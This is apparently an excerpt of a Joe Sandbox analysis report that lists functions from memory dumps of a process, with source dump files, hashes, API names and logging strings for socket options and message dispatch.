                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 080e8fde5a2ba98204fe8d5300717fb1248164f312ba23c459eec33983392385
                    • Instruction ID: 8410c7a29659df75c6854531af58257741b97c659d171a7f0c8538036e5edefd
                    • Opcode Fuzzy Hash: 080e8fde5a2ba98204fe8d5300717fb1248164f312ba23c459eec33983392385
                    • Instruction Fuzzy Hash: 23F09661F0D54282F7505BEDF8005B96360ABC47D8F108235EE1D837A5DE7CD946C701
                    Function 00007FF8B9152209 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 1289b7a90d17fec904992b7589ad629829b1e3bc695305fe6ce7cbd808189d16
                    • Instruction ID: 3f2760fe8baa884364ab08d6b84d732b706c39ab5bbb6225552d4bed44006d37
                    • Opcode Fuzzy Hash: 1289b7a90d17fec904992b7589ad629829b1e3bc695305fe6ce7cbd808189d16
                    • Instruction Fuzzy Hash: 5BF0C2B6E0828246F7104F6DA8001B55660EB957D4F218231EE1D933A4DE3CE846E700
                    Function 00007FF8BFAB13F9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 2ea57274a692c49723bcaec0cb70b630c7dd65c16a70518f7afc343e942745d1
                    • Instruction ID: 8d3f1f5e101115e1872dc9f5b116f1c7d477e59edd42cf38a882379375115950
                    • Opcode Fuzzy Hash: 2ea57274a692c49723bcaec0cb70b630c7dd65c16a70518f7afc343e942745d1
                    • Instruction Fuzzy Hash: 18F09CA1F1C50246F31457ADB8022B55760EF847DCF50A131DF1D977A5DD3CD94A8700
                    Function 00007FF8BA502209 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: a429915bc11f3c506707949fc448ac0a6534b50bb89eadfb2e2ad2377f1bab6d
                    • Instruction ID: 1f8baa25038b56a6bb9b9ca0d1ed39586cf5db3455218b363a4475bb9a793eed
                    • Opcode Fuzzy Hash: a429915bc11f3c506707949fc448ac0a6534b50bb89eadfb2e2ad2377f1bab6d
                    • Instruction Fuzzy Hash: 93F06871E0C5079AF76157DDAC4017A6150EB967D4F144172EF1D837B4DE3CDA4A8701
                    Function 00007FF8B9184D89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 55c4fc8c7edf6649744f78dd5b51b38eff451531802172770dc8402a3ff2acae
                    • Instruction ID: b56c794e7f13711f668ddc68cf9206314b4cc8595b9d85b383e1ecc3752187d6
                    • Opcode Fuzzy Hash: 55c4fc8c7edf6649744f78dd5b51b38eff451531802172770dc8402a3ff2acae
                    • Instruction Fuzzy Hash: 5FF02B61F0C18256F3104F2DA8401B96660AF947E4F118331EE2E933E5DE3CE847B701
                    Function 00007FF8BFB5247A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    • Opcode ID: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                    • Instruction ID: f9b76121b091e8bf4ddbd983e265edd573ea8f91927c2e3b0d11004730f14cfc
                    • Opcode Fuzzy Hash: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                    • Instruction Fuzzy Hash: 84F09661A0915296F7105F9DF8005A67760BB947D4F004231EF5D83BD4DF7CE545CB00
                    Function 00007FF8BFB81A0A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    • Opcode ID: 0437d92ffc93275b6e345f4410a481b5b83083ff933dd21acdf64e7b0c4e13cb
                    • Instruction ID: f8c01f93cc01feef4ef4e5cdb77bf74c3f573cb8a8c31f01d5d49b07241c880e
                    • Opcode Fuzzy Hash: 0437d92ffc93275b6e345f4410a481b5b83083ff933dd21acdf64e7b0c4e13cb
                    • Instruction Fuzzy Hash: CFF09661A0D15286F3105FADF8046B66760ABC47D4F048235EE6D83795DF7CD949CB00
                    Function 00007FF8B915233A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    • Opcode ID: 9528aeaa2bf256ae8ff0f18ad45033aaf4b3f86c5b89e20fedb4b7824a9256c1
                    • Instruction ID: 9675905ba5984215370ed3c1b91cc47f9745e2a17f9f0331bddb6e6b785d351b
                    • Opcode Fuzzy Hash: 9528aeaa2bf256ae8ff0f18ad45033aaf4b3f86c5b89e20fedb4b7824a9256c1
                    • Instruction Fuzzy Hash: C4F0F6A1B082824AF3505F1EB8001B66661AB883E4F108231EF5D837D4DF7CD589EB00
                    Function 00007FF8BFAB152A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    • Opcode ID: fd868c65be3afd4cf4706a3199d6f8f6826288c199685166dd3a51f61f000229
                    • Instruction ID: c2c81055ad4814c2a162e0fb38be9ad6f283391f2d88b0d379212b11af09505d
                    • Opcode Fuzzy Hash: fd868c65be3afd4cf4706a3199d6f8f6826288c199685166dd3a51f61f000229
                    • Instruction Fuzzy Hash: 26F0FC61B0850149F3145F5DBC012655764AB843D8F409231EF1D837E5DE3CD54DC700
                    Function 00007FF8BA50233A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    • Opcode ID: fac0814526277d35c4ae5de8df6aa49abb8a23ef8b610365522404217a87e9a8
                    • Instruction ID: 0230ac9dc29d53df7717308482facd3f68557dbdafeb762528be4e2380f4a0a7
                    • Opcode Fuzzy Hash: fac0814526277d35c4ae5de8df6aa49abb8a23ef8b610365522404217a87e9a8
                    • Instruction Fuzzy Hash: 26F06871A0C142A5F3605B5DBC405BA6550EB857E4F404271EF5D837A4DB7CDA4A8700
                    Function 00007FF8B9184EBA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                    • API String ID: 1729277954-3534120083
                    • Opcode ID: 4fd31f1ea14685cc47037a91840700bcfe726a69cab849f9c3268bbebf3dbd7d
                    • Instruction ID: dbd5bd8f07a5da5b8f0c47525de92ea1b5b8f5faafe28a441d3196e73335dc97
                    • Opcode Fuzzy Hash: 4fd31f1ea14685cc47037a91840700bcfe726a69cab849f9c3268bbebf3dbd7d
                    • Instruction Fuzzy Hash: C5F0F661B085828AF3105F1DA8406B56661AB843E4F108231EE2D83BD5DF7CD947EB00
                    Function 00007FF8BFB81A76 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                    • API String ID: 1729277954-536111009
                    • Opcode ID: efdd2f4e0631f6d227b78a496f5860539d083fedbc232eec6b79c452b0d326fa
                    • Instruction ID: e0035c0396eadf7912557962a66d3eae1d985f310ec7c81925add4ad04bb38ab
                    • Opcode Fuzzy Hash: efdd2f4e0631f6d227b78a496f5860539d083fedbc232eec6b79c452b0d326fa
                    • Instruction Fuzzy Hash: 57F09061A0854286E3109FAEF8005756760AB887D4F10C331EA6D837A4DE3CD50ACB00
                    Function 00007FF8BFB8924C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: memsetstrchr
                    • String ID: [D] (%s) -> %s$sam3_recv_rsp
                    • API String ID: 2564583029-4292814133
                    • Opcode ID: 6054bc854355412dd534d9800395cb815e31de645798f9446980f867bb94e619
                    • Instruction ID: 471846009eb15f8d0148469fee1f802491f413c298e58b7d902158506ede7860
                    • Opcode Fuzzy Hash: 6054bc854355412dd534d9800395cb815e31de645798f9446980f867bb94e619
                    • Instruction Fuzzy Hash: CA215122F0C55242FE2155ED68147B867404F82FF0F688331EF7D8A7D6DE1CA842D201
                    Function 00007FF8BFB89A40 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • ebus_dispatch, xrefs: 00007FF8BFB89ACA
                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8BFB89AD1
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                    • API String ID: 3168844106-1717220914
                    • Opcode ID: 5f07f7dd6c7a8ca443123c93aa7333b3264cb797661900b59e1563f9beebcf4d
                    • Instruction ID: dc023329bf1bd25f25b0379eca4aa750102418e81bad979789e348e1a7740482
                    • Opcode Fuzzy Hash: 5f07f7dd6c7a8ca443123c93aa7333b3264cb797661900b59e1563f9beebcf4d
                    • Instruction Fuzzy Hash: 36214F32A18A4685EB148F9DE88016977A0FB84FD8F548135DF8D47BA8DF3CD841C700
                    Function 00007FF8B9151780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8B9151811
                    • ebus_dispatch, xrefs: 00007FF8B915180A
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                    • API String ID: 3168844106-1717220914
                    • Opcode ID: f8d29101610d8f76ac1ed4feefd51e892c0e55ef3eadb0d75f62bac78426d285
                    • Instruction ID: 90a9f288c0f04b3fdc422082309e99f4dc68bd75de7765265834ecdc89b1abc8
                    • Opcode Fuzzy Hash: f8d29101610d8f76ac1ed4feefd51e892c0e55ef3eadb0d75f62bac78426d285
                    • Instruction Fuzzy Hash: D5216D32A09AC286EB228F19F85016967A4FB44BD4F548135DF8E477A8DF3CE881E700
                    Function 00007FF8BA501780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8BA501811
                    • ebus_dispatch, xrefs: 00007FF8BA50180A
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                    • API String ID: 3168844106-1717220914
                    • Opcode ID: 8e0882bfb16548fdbf9dfd9db4ecb549daa1a64d832ac2d375aca87d32d6b52b
                    • Instruction ID: 02d8e5dc36b3505a46eed67acc1d440dcf5bb792aac7b6d4d6320713ce83da55
                    • Opcode Fuzzy Hash: 8e0882bfb16548fdbf9dfd9db4ecb549daa1a64d832ac2d375aca87d32d6b52b
                    • Instruction Fuzzy Hash: 1E211A32A0DA82D6EB608F99EC8017AA364FB46BD4B544176DF4D877A8DF2CDA45C700
                    Function 00007FF8B918EE60 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • ebus_dispatch, xrefs: 00007FF8B918EEEA
                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8B918EEF1
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                    • API String ID: 3168844106-1717220914
                    • Opcode ID: 6ceb723587c1d552a552b3ca08934bf7bc6d823551b69239d98c8e8180dbb2b5
                    • Instruction ID: 81c6790ab38e76af12fee2b21d678a56249cff04711593347faecb4257a60471
                    • Opcode Fuzzy Hash: 6ceb723587c1d552a552b3ca08934bf7bc6d823551b69239d98c8e8180dbb2b5
